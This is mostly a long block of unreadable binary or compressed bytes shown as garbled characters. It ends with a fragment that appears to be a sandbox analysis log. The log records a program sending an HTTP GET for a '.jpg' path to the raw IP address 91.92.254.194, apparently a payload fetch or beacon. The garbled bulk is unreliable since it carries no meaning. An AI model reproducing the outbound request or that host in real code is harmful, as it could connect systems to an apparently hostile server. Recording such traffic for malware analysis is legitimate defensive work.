×'‹xî«Vò)ó$$k¡Øb(ÚI¬Ó¡¾*ëššf¦s!LôK‘â ¦R8eu æN¸éÒêh¿æ_^äk$ú!‹n8}s+j••”ÕltŕK0’p4¼E'ˆø”PF¥‹0géß³~‚ø6žZm¤µ ³ÏôϜ~Ê~Ǹaâz˜Åµ >5Ÿ[”l!v­Uð;F q!’´¬£Ò7 ³\Šøæ6¹Ó`òØ01S¡Mî=@øcÈ : ÀÄu0²,‡xa³}‹äoÛí;›|˜e€ÁšH˜.¡¨Ôª nÜvó~“Vp’é,}DH†?3sn¯Å¶¨ »¾ƒ¶'?‡ÍJ Ä|‹Vnã]ÌG;žb]2C¡iLeSTË*í²Éé<ÐäW_~2uú ]lfi )cg)!€y7(Gb—ð¬ñˆ¤o<s¾èÕ!MìZùä–:ï›U'ˆK £, cµ¨…åˆ`»zv&þ¤X+§ÔxhÒéRy´ÈB¨u17™»ÏÜ[x[­Ÿæ?x”Z­ðl–]<r¶)f€€%óo¢©ä  °÷£Ôäx‡ƒÉ©£Á)_5[nàªÑ.æ^Ts^ٜt 2iÞ£ +:ïUvÚUUšÔ)4`„ôçºÙôiö’¡ÄŽÕ ¦0ËÅ ±´{sxtñÜ~ìh¼°íìi|ÝÖ?s_†Ç1ö®÷•Öø¡4K³é–Ti\)WV`"I~)k†®sE ŸT±“ŒÛX€Içh'·¶“ë<9´¾"› YfžF‰R3µøŠím«Á_3¨:Y O —M¦Ôêåš%”#ˆ•”PÚM¬*­HíÅÞ ü%£ÓJŽ%`ÊOHâY]_á`:u—Öø>§G¡‡W+ÄÑ<KKµÅn‰™ye Üá&^§—›Câ @4ú†Ó³AAT´L€RñéY8ÜnÊÍ¢Óêµ_h'Ó¶…cfhô›çŽ!fea´3 ô†çæ:œÊ…%Õxv¥ÑâuEvVݹ”°RW‚8,½Hã<Q3ˆZH”3COLÀ4±—EÚªX’ÉXÎî»Gýÿ¶mAâßwmZ8€Hþ 0+À¬¬Û¢b*TúCaÛÞ³¤û7®‚}\.ñÓ*—½ëÃDÓ  ƒ¶6ê°¾#öbxå—ÍÔéc’ñyguÊÐĬûHZ–ˆŒÕë|H<b8DE¦ÔÈúJ”¢‰`P ^RAÿ ô ^¾¯Å~Ο-š(áA1FH%*°:j¡ˆ4Æú°»Ï7?ÙýF›@ÚæxŒkÌT9-L°°í×þПò¶WÂ<oŽy"š8c…•]\…, •Rz[– +“€]_ÜN‹U&—_Õ8Š‰·<ué`B…gƒ´ñÓ Å4K"jS<P²ÆJ+ÆXHÖ=6+bû}G\ #ÊðíCl ÞtaK çkôý3KGösS¯‹K žcՕX‹î¦vwEJPycè+’,`fO¨Ž]Tî=’ÛcU4,åRtó¢ ¬•qÇ^›ÒA@ š$voûcm4’Æe€†”J‘,+e˜¶ãé µõÀ›f¨°ˆ€ù^F¥¯PYFÀ ªVûáX3ÂÛ¼¥±¸)½ÇÕUuCŸlY%uk#sÁ&Èù`9§Ò™åF/›½Â‰ãɧ”Ú+£ w횯áÞ!Ò®›G.ª]Fua`GfU$©Ü¥lr*Çðq=pÕèghuE¡tdWV*ÊÅX¤Ñµ?Ï¡WÂ[C©kÕjtð@ Ȍw7[Uº|s>5h™/Ê!C3XµøvçòÌÏ9•Fâ(×7étóýݦ” xXµívÖ>®)*Æ‹¥±ùw¬±ˆVˆÜÛWÓÇadà_O©ÜÄ,AÊÝüFTI>ÝÂ(Ê]pN:Âé§ÔmP9ãß44 ¤"‘Ôo°¢›ðñ|{‘˜š¹dT(æ+n [#ŽÇ‰õ:=jBEs;Ââ(¨V&¾N0Š]&§Ä%ML‰[f]ò1UV±Rh}AxßJ7X׃Ϡ3jÐC e`có^ãfHX,˸}¬Š$í#Yš­4šÔÁéÞ3¿R¬kµc28<…zuî—À§&5]¢wžxP f L¥”µ¨^ƒøI逮¤èÖ_ܤ»B.ã [Ý´éÚì‡8º8‚¡QÛmQÃx´-áÚ¦ÒÏ$- TvÙ(eõ(`´l]u°+ŸŽæNwí ÞÒ===úá×đ!UdõÀ_陚‡wr„qÚðÍ4a‘\-.Öó8mCnRÊ·6FÇ$ڕ2)ŠEõ9}<ávŒªÑ H1öÔ'–Œ«R`/>™Ì#Íñ`H•|Ç7R_Æ\Ê$V›YõYLVWMEîdÚÃjóTp:¨‘¤HØ~*,b2JË3G9£Ž(·4›X/âšy™cU}°$žNEdô9Ç®ƒ uÂDÛKʲÓoÖ°$ÞpàIøç#¡# 04”/†Ü`wE“Yc!òÂvþyPÛOL€/çÄ–ëÚ²v»»]uÈÀYbÖ*€ÊÖËmxã.“2«Ô÷ÀŒ,jK8“ðÀkK»2»¨UÌÇ Àê™ZBˆ}+ÒÎPΛéy€äN£¨£m±÷È3³!<–OÞv¨AQÛ8LÌ lZcÓBwÚTÑßy”C,ÈÉ'úm9yoé+H –aú©ã(󬺦‘Í„(ãŽé€9%c@)_˜Î–üµµ£òÃyòH«ûµk4 }B³®Ön@è{`-ˆÜ±雿d]Ǎ9í(ĊÏ:()çœõ?d“Å™+ƒ ±ÓÖBÊm †Ü¦»á¤š&ˆ8A³`]s(ÝÒVÅ©ºùŒ˜5@4HULJ?‹­_\õ<úp‘z%'jÞûŽx-^›Q¥Ö²ÉîÞ[ÌU$µõ®Ùî5²”XÞdVÍ[æ€T{÷Ï=âæÒx‚²êaÔƤ~å mx³ý/.]d›¡S­«æ½ùŒhásq,ˆA ¯Í|ˆ®qÉüQ&ñXõ'OJ?C?ݾ˜ßûKlZ˜Æ”†1ÌÎäðk¡¬ ȦӤŽD$T·!~5× «Ml³i™ß`Dfà
Data sent GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
host 91.92.254.194
Time & API Arguments Status Return Repeated

send

buffer: GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
socket: 1540
sent: 83
1 83 0